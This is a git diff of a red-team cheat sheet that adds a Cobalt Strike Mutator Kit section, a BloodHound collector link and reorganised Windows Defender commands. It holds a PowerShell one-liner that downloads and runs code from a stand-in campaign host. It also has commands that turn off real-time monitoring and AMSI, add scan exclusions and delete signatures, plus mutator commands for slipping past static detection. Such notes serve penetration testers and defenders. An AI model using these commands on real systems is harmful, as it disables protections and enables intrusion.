Windows Defender Antivirus - DefenderCheck
parent
da323c6cd4
commit
59791e0c9f
|
@ -9,6 +9,7 @@ Use the correct collector:
|
||||||
* [FalconForceTeam/SOAPHound](https://github.com/FalconForceTeam/SOAPHound) for local Active Directory (C# collector using ADWS)
|
* [FalconForceTeam/SOAPHound](https://github.com/FalconForceTeam/SOAPHound) for local Active Directory (C# collector using ADWS)
|
||||||
* [NH-RED-TEAM/RustHound](https://github.com/NH-RED-TEAM/RustHound) for local Active Directory (Rust collector)
|
* [NH-RED-TEAM/RustHound](https://github.com/NH-RED-TEAM/RustHound) for local Active Directory (Rust collector)
|
||||||
* [fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) for local Active Directory (Python collector)
|
* [fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) for local Active Directory (Python collector)
|
||||||
|
* [coffeegist/bofhound](https://github.com/coffeegist/bofhound) for local Active Directory (Generate BloodHound compatible JSON from logs written by ldapsearch BOF, pyldapsearch and Brute Ratel's LDAP Sentinel)
|
||||||
|
|
||||||
**Examples**:
|
**Examples**:
|
||||||
|
|
||||||
|
|
|
@ -13,6 +13,7 @@ $ ./cobaltstrike
|
||||||
$ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://campaigns.example.com/download/dnsback'))"
|
$ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://campaigns.example.com/download/dnsback'))"
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
* [Infrastructure](#infrastructure)
|
* [Infrastructure](#infrastructure)
|
||||||
|
@ -39,6 +40,7 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri
|
||||||
* [Artifact Kit](#artifact-kit)
|
* [Artifact Kit](#artifact-kit)
|
||||||
* [Mimikatz Kit](#mimikatz-kit)
|
* [Mimikatz Kit](#mimikatz-kit)
|
||||||
* [Sleep Mask Kit](#sleep-mask-kit)
|
* [Sleep Mask Kit](#sleep-mask-kit)
|
||||||
|
* [Mutator Kit](#mutator-kit)
|
||||||
* [Thread Stack Spoofer](#thread-stack-spoofer)
|
* [Thread Stack Spoofer](#thread-stack-spoofer)
|
||||||
* [Beacon Object Files](#beacon-object-files)
|
* [Beacon Object Files](#beacon-object-files)
|
||||||
* [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike)
|
* [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike)
|
||||||
|
@ -423,24 +425,40 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 :
|
||||||
- Build the Artifact
|
- Build the Artifact
|
||||||
- Cobalt Strike -> Script Manager > Load .cna
|
- Cobalt Strike -> Script Manager > Load .cna
|
||||||
|
|
||||||
|
|
||||||
### Mimikatz Kit
|
### Mimikatz Kit
|
||||||
|
|
||||||
* Download and extract the .tgz from the Arsenal (Note: The version uses the Mimikatz release version naming (i.e., 2.2.0.20210724)
|
* Download and extract the .tgz from the Arsenal (Note: The version uses the Mimikatz release version naming (i.e., 2.2.0.20210724)
|
||||||
* Load the mimikatz.cna aggressor script
|
* Load the mimikatz.cna aggressor script
|
||||||
* Use mimikatz functions as normal
|
* Use mimikatz functions as normal
|
||||||
|
|
||||||
|
|
||||||
### Sleep Mask Kit
|
### Sleep Mask Kit
|
||||||
|
|
||||||
> The Sleep Mask Kit is the source code for the sleep mask function that is executed to obfuscate Beacon, in memory, prior to sleeping.
|
> The Sleep Mask Kit is the source code for the sleep mask function that is executed to obfuscate Beacon, in memory, prior to sleeping.
|
||||||
|
|
||||||
Use the included `build.sh` or `build.bat` script to build the Sleep Mask Kit on Kali Linux or Microsoft Windows. The script builds the sleep mask object file for the three types of Beacons (default, SMB, and TCP) on both x86 and x64 architectures in the sleepmask directory. The default type supports HTTP, HTTPS, and DNS Beacons.
|
Use the included `build.sh` or `build.bat` script to build the Sleep Mask Kit on Kali Linux or Microsoft Windows. The script builds the sleep mask object file for the three types of Beacons (default, SMB, and TCP) on both x86 and x64 architectures in the sleepmask directory. The default type supports HTTP, HTTPS, and DNS Beacons.
|
||||||
|
|
||||||
|
|
||||||
|
### Mutator Kit
|
||||||
|
|
||||||
|
> The Mutator Kit, introduced by Cobalt Strike, is a tool designed to create uniquely mutated versions of a "sleep mask" used in payloads to evade detection by static signatures. It utilizes LLVM obfuscation techniques to alter the sleep mask, making it difficult for memory scanning tools to identify the mask based on predefined patterns, thereby enhancing operational security for red team activities.
|
||||||
|
|
||||||
|
The OBFUSCATIONS variable can be `flattening`,`substitution`,`split-basic-blocks`,`bogus`.
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
OBFUSCATIONS=substitution mutator.sh x64 -emit-llvm -S example.c -o example_with_substitutions.ll
|
||||||
|
mutator.sh x64 -c -DIMPL_CHKSTK_MS=1 -DMASK_TEXT_SECTION=1 -o sleepmask.x64.o src49/sleepmask.c
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Thread Stack Spoofer
|
### Thread Stack Spoofer
|
||||||
|
|
||||||
> An advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to bypass thread-based memory examination rules and better hide shellcodes while in-process memory.
|
> An advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to bypass thread-based memory examination rules and better hide shellcodes while in-process memory.
|
||||||
|
|
||||||
Thread Stack Spoofer is now enabled by default in the Artifact Kit, it is possible to disable it via the option `artifactkit_stack_spoof` in the config file `arsenal_kit.config`.
|
Thread Stack Spoofer is now enabled by default in the Artifact Kit, it is possible to disable it via the option `artifactkit_stack_spoof` in the config file `arsenal_kit.config`.
|
||||||
|
|
||||||
|
|
||||||
## Beacon Object Files
|
## Beacon Object Files
|
||||||
|
|
||||||
> A BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs
|
> A BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs
|
||||||
|
@ -489,3 +507,4 @@ beacon> PortBender redirect 445 8445
|
||||||
* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/)
|
* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/)
|
||||||
* [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm)
|
* [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm)
|
||||||
* [Cobalt Strike 4.6 - User Guide PDF](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-6-user-guide.pdf)
|
* [Cobalt Strike 4.6 - User Guide PDF](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-6-user-guide.pdf)
|
||||||
|
* [Introducing the Mutator Kit: Creating Object File Monstrosities with Sleep Mask and LLVM - @joehowwolf @HenriNurmi](https://www.cobaltstrike.com/blog/introducing-the-mutator-kit-creating-object-file-monstrosities-with-sleep-mask-and-llvm)
|
|
@ -321,29 +321,45 @@ Add-MpPreference -AttackSurfaceReductionRules_Ids <Id> -AttackSurfaceReductionRu
|
||||||
|
|
||||||
Also known as `Microsoft Defender`.
|
Also known as `Microsoft Defender`.
|
||||||
|
|
||||||
```powershell
|
* Check status of Defender
|
||||||
# check status of Defender
|
```powershell
|
||||||
PS C:\> Get-MpComputerStatus
|
PS C:\> Get-MpComputerStatus
|
||||||
|
```
|
||||||
|
|
||||||
# disable scanning all downloaded files and attachments, disable AMSI (reactive)
|
* Disable scanning all downloaded files and attachments
|
||||||
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
|
```powershell
|
||||||
PS C:\> Set-MpPreference -DisableIOAVProtection $true
|
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
|
||||||
|
PS C:\> Set-MpPreference -DisableIOAVProtection $true
|
||||||
|
```
|
||||||
|
|
||||||
# disable AMSI (set to 0 to enable)
|
* Disable AMSI (set to 0 to enable)
|
||||||
PS C:\> Set-MpPreference -DisableScriptScanning 1
|
```powershell
|
||||||
|
PS C:\> Set-MpPreference -DisableScriptScanning 1
|
||||||
|
```
|
||||||
|
|
||||||
# exclude a folder
|
* Exclude a folder, a process from scanning
|
||||||
PS C:\> Add-MpPreference -ExclusionPath "C:\Temp"
|
```powershell
|
||||||
PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
|
PS C:\> Add-MpPreference -ExclusionPath "C:\Temp"
|
||||||
PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
|
PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
|
||||||
|
PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
|
||||||
|
```
|
||||||
|
|
||||||
# exclude using wmi
|
* Exclude a folder using WMI
|
||||||
PS C:\> WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\Users\Public\wmic"
|
```powershell
|
||||||
|
PS C:\> WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\Users\Public\wmic"
|
||||||
|
```
|
||||||
|
|
||||||
|
* Remove signatures. **NOTE**: if Internet connection is present, they will be downloaded again.
|
||||||
|
```powershell
|
||||||
|
PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
|
||||||
|
PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
|
||||||
|
```
|
||||||
|
|
||||||
|
Identify the exact bytes that are detected by Windows Defender Antivirus
|
||||||
|
|
||||||
|
* [matterpreter/DefenderCheck](https://github.com/matterpreter/DefenderCheck) - Identifies the bytes that Microsoft Defender flags on
|
||||||
|
* [gatariee/gocheck](https://github.com/gatariee/gocheck) - DefenderCheck but blazingly fast™
|
||||||
|
|
||||||
# remove signatures (if Internet connection is present, they will be downloaded again):
|
|
||||||
PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
|
|
||||||
PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
## Windows Defender Application Control
|
## Windows Defender Application Control
|
||||||
|
|
Loading…
Reference in New Issue